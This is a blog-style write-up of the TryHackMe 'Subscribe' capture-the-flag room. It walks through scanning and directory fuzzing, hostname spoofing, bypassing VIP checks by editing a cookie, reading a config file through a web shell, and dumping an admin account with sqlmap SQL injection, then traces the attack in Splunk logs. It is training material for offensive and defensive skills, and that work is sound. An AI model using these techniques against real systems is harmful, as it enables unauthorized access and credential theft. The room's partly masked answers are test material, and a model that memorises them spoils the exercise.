TryHackMe - TryHack3M: Subscribe Writeup

TryHackMe - TryHack3M: Subscribe Writeup cover image

Category: CTF

Posted at: Sep 17, 2024

12 Minutes Read

In this write-up, we explore the TryHack3M: Subscribe room on TryHackMe, step by step uncovering techniques to identify flags along the way.


Room Objectives

To assist the HackM3.thm company in fixing the application, you need to:

  • Explore the web server and find the attack vectors leveraged by the attacker.
  • Regain access and restore the signup functionality for the new users.
  • Investigate the web application logs and track down the root cause.

Let’s start !



Let's begin with an Nmap scan using the -sV option, which scans ports and identifies their version numbers.

$ nmap -sV
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
8000/tcp open  http     Splunkd httpd
8089/tcp open  ssl/http Splunkd httpd (free license; remote login disabled)

What is the invite code for the hackme.thm website?

Before we begin, let's add the IP address to the hosts file and assign it the domain hackme.thm.

Let's perform some directory enumeration using Feroxbuster. -n non recursive scan, -k disables TLS certificate validation.

$feroxbuster -u http://hackme.thm/ -w ~/snap/feroxbuster/common/common.txt -nk

200      GET      312l      603w     5472c <http://hackme.thm/css/index.css>
200      GET      119l      179w     1776c <http://hackme.thm/css/slick.css>
200      GET       45l      150w    14230c <http://hackme.thm/img/logo.png>
200      GET       71l      173w     2875c <http://hackme.thm/login.php>
200      GET        1l      528w    93234c <http://hackme.thm/js/bootstrap431.min.js>
200      GET        5l       98w   170570c <http://hackme.thm/css/all.css>
200      GET     9167l    19586w   191263c <http://hackme.thm/css/boostrap431.min.css>
200      GET       47l       82w      689c <http://hackme.thm/css/slick-data.css>
200      GET       69l      172w     2761c <http://hackme.thm/sign_up.php>
200      GET     1073l     4285w    34016c <http://hackme.thm/js/popper.min.js>
200      GET     3308l     5954w    51595c <http://hackme.thm/css/general-style.css>
200      GET     3243l    19071w   128378c <http://hackme.thm/js/jquery.min.js>
200      GET       89l      361w     4499c <http://hackme.thm/>
301      GET        9l       28w      306c <http://hackme.thm/css> => <http://hackme.thm/css/>
200      GET        3l       35w    17226c <http://hackme.thm/favicon.ico>
200      GET       89l      361w     4499c <http://hackme.thm/index.php>
301      GET        9l       28w      306c <http://hackme.thm/img> => <http://hackme.thm/img/>
301      GET        9l       28w      313c <http://hackme.thm/javascript> => <http://hackme.thm/javascript/>
301      GET        9l       28w      305c <http://hackme.thm/js> => <http://hackme.thm/js/>
301      GET        9l       28w      313c <http://hackme.thm/phpmyadmin> => <http://hackme.thm/phpmyadmin/>

Nothing interesting except /login, /phpmyadmin and /sign_up

I initially checked the /phpmyadmin directory but didn’t find anything useful. Then, I navigated to the signup page, it was noted that the hacker had disabled signups, making them accessible only through an invitation code, so let's find the invitation key!

While exploring the website with Burp Suite proxy enabled, I noticed a script invite.js being called when I visit the signup page.

function e() {
  var e = window.location.hostname;
  if (e === "capture3millionsubscribers.thm") {
    var o = new XMLHttpRequest();"POST", "inviteCode1337HM.php", true);
    o.onload = function () {
      if (this.status == 200) {
        console.log("Invite Code:", this.responseText);
      } else {
        console.error("Error fetching invite code.");
  } else if (e === "hackme.thm") {
    console.log("This function does not operate on hackme.thm");
  } else {
    console.log("Lol!! Are you smart enought to get the invite code?");

According to the script, the hostname should be capture3millionsubscribers.thm in order to receive the code. Let's add it to the /etc/hosts file and try again.

Visit http://capture3millionsubscribers.thm/sign_up.php and you will see the code printed on the console:

Invite Code: *****:Invited30MnUsers

What is the password for the user guest@hackme.thm?

Just submit the code and you will get an error containing the user and password

Uploaded Image

What is the secure token for accessing the admin panel?

After logging in, We can see there are two rooms, one is free and the other one for VIP members, the free one did not contain anything useful. Then, I noticed a cookie named isVIP has the value false , I changed it to true and I had access to the VIP room. While reviewing the Burp Suite proxy http history, I came across the following script.

// sc-drFUgV fXEjrf
$(document).ready(function () {
 $("#start_machine").click(function (e) {
   var isVIPE = document.getElementById("isVIP");
   var isVIP = isVIPE.value.toLowerCase() === "true";
   if (isVIP) {
     $("#splitScreenRight").attr("class", "sc-drFUgV bROZdw");
     $("#main1").attr("class", "sc-bKNmIE bYiuLB");
     $("#main2").attr("class", "sc-hZDbVM bksodH");
     $("#nav1").attr("class", "sc-krITIZ gMgnKr");
   } else {
     alert("This page is only for VIP users");

$(document).ready(function () {
 $("#exit_split").click(function (e) {
   $("#splitScreenRight").attr("class", "sc-drFUgV fXEjrf");
   $("#main1").attr("class", "sc-bKNmIE ipXaXG");
   $("#main2").attr("class", "sc-hZDbVM hgVIhb");
   $("#nav1").attr("class", "sc-krITIZ hoLoqS");

The script listens for clicks on the 'Start Machine' button and verifies whether the user is a VIP based on an input value <input type="hidden" id="isVIP" value="true">. I searched for this input in the inspection tab and changed its value from false to true. After that, I clicked the 'Start Machine' button, which opened a split view similar to the TryHackMe website, and it was a shell to the server.

Here I found a script which was related to the shell. Looking at the script we can see that we are limited to four commands:

$(document).ready(function () {
  $("#shell_commands").on("keydown", function (event) {
    if (event.which == 13) {
      // Hackme.thm emulator capable of exeuting following commands:// - run  <machine AMI>// - whoami "returns username"
      // - ls "list the files"
      // -  cat <filename> "list contents of files accessed jointly by dev and prod team"
      var cmd = $("#shell_commands").val();
      $.get("run_machine_hackme.php", { command: cmd }, function (data) {
        var output = data;
        var output = decodeHtmlEntities(data);
      }).fail(function () {
        $("#shell_output").text("Error executing command.");


function decodeHtmlEntities(str) {
  return str
    .replace(/&lt;/g, "<")
    .replace(/&gt;/g, ">")
    .replace(/&quot;/g, '"')
    .replace(/&amp;/g, "&");
  // Extend with other entities as needed

I listed the files and attempted to read some of them, but I couldn't access most. However, I was able to read the config.php file, which contained a URL to the admin panel and a secret token.

$urlAdminPanel= "<http://admin1337special.hackme.thm:40009>";

What is the flag value after enabling the registration feature and getting 3M subscribers on the platform?

Add admin1337special.hackme.thm to the hosts file.

When visiting the URL, I was redirected to http://admin1337special.hackme.thm:40009/public/html/ with a status code of 403 (Unauthorized). I attempted to add a cookie SECURE_TOKEN=ACC#SS_TO_ADM1N_*****, but it didn’t work. I started fuzzing directories within /public/html and got this results:

404      GET        9l       31w      292c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      295c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      357c <http://admin1337special.hackme.thm:40009/public/html> => <http://admin1337special.hackme.thm:40009/public/html/>
403      GET        0l        0w        0c <http://admin1337special.hackme.thm:40009/public/html/dashboard>
200      GET        0l        0w        0c <http://admin1337special.hackme.thm:40009/public/css/styles.css>
200      GET       50l      100w     1662c <http://admin1337special.hackme.thm:40009/public/html/login.php>
200      GET       27l       72w      776c <http://admin1337special.hackme.thm:40009/public/js/login.js>
200      GET       13l       27w      321c <http://admin1337special.hackme.thm:40009/public/js/logout.js>
200      GET        9l       12w      154c <http://admin1337special.hackme.thm:40009/public/html/logout>
200      GET        2l     1044w    69917c <http://admin1337special.hackme.thm:40009/public/js/jquery-3.3.1.slim.min.js>
200      GET        7l      662w    58072c <http://admin1337special.hackme.thm:40009/public/js/bootstrap.min.js>
200      GET        7l     1966w   155758c <http://admin1337special.hackme.thm:40009/public/css/bootstrap.min.css>
200      GET       50l      100w     1662c <http://admin1337special.hackme.thm:40009/public/html/login>

I navigated to http://admin1337special.hackme.thm:40009/public/html/login.php and found the following:

Uploaded Image

I tried the previous token and it did work! it redirected us to login page but no idea about the credential.

After a long period of fuzzing, I decided to give the login script to Chatgpt to help identify potential vulnerabilities. It suggested SQL injection as a possible vulnerability, even though the script didn’t indicate any signs of it. I added a single quote (') to the username input and received an interesting error. It hadn’t occurred to me to try SQL injection, but surprisingly Chatgpt's suggestion actually worked!

Uploaded Image

I copied the request into text file and ran sqlmap

$ sqlmap -r req.txt --dbs --batch

We have successfully retrieved 6 databases:

available databases [6]:
[*] hackme
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] sys

Run the second command to retrieve the tables from the hackme database.

$ sqlmap -r req.txt --dbs --batch -D hackme --tables
Database: hackme
[2 tables]
| config |
| users  |

And now, let's dump the data from the users table.

$ sqlmap -r req.txt --dbs --batch -D hackme -T users --dump
Database: hackme
Table: users
[1 entry]
| id | email            | name       | role   | status   | password     | username |
| 1  | admin@hackme.thm | Admin User | admin  | 1        | admin******* | admin    |

Let's log in and retrieve the flag. In the admin dashboard, change the action to 'Sign Up,' and then visit the website http://capture3millionsubscribers.thm/. You will see the flag there with fireworks :)


Investigating the Attack

Our security department detected an alert about a web attack on the 4th of April, 2024. They have ingested the logs into Splunk, which can be accessed using the following credentials: TryHackMe credentials.

Your task is to analyse the logs and track the attacker's footprints.

How many logs are ingested in the Splunk instance?

It was my first time using Splunk, so I felt a bit lost.

Uploaded Image

I click on "Search your data" and then changed the filtering to "all time"

Uploaded Image

and the typed "*" in the search bar and got this

Uploaded Image

I submitted the number in the top left corner to check if what I did was correct, and it was!

What is the web hacking tool used by the attacker to exploit the vulnerability on the website?

While viewing the Patterns tab, I found the following:

Uploaded Image

You will find the answer in the user agent.

How many total events were observed related to the attack?

Select the pattern and you will find the answer in the top right corner.

Uploaded Image

What is the observed IP address of the attacker?

You can see it displayed in the pattern. {"source_ip": "83.45.***.**"}

How many events were observed from the attacker's IP?

Simply copy and paste the IP address into the search bar and hit enter.

What is the table used by the attacker to execute the attack?

Uploaded Image

Good luck!